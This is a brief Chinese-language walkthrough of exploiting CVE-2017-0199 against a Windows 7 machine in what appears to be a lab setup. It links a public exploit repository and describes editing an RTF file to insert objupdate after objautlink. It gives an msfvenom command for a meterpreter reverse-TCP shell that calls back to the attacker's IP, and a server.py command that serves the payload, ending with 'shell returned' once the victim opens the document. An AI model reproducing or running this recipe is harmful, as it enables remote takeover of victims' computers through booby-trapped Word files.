准备工作:
攻击者电脑(kali):192.168.1.130
被攻击者电脑(win7):192.168.115
下载漏洞利用工具:https://github.com/haibara3839/CVE-2017-0199-master
把innocent.doc和server.py两个文件放到攻击者电脑上,并开启Apache服务
漏洞利用:
1、新建个word,向下面这样配置
2、保存成RTF格式
3、使用记事本打开test.rtf文件,在文件中查找objautlink,然后在objautlink后面插入objupdate
4、然后配置反弹shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f exe > shell.exe
5、运行server.py服务
先把Apache服务关闭
python server.py 80 http://192.168.1.130/shell.exe /var/www/html/shell.exe
被攻击端打开word,点击是
成功返回shell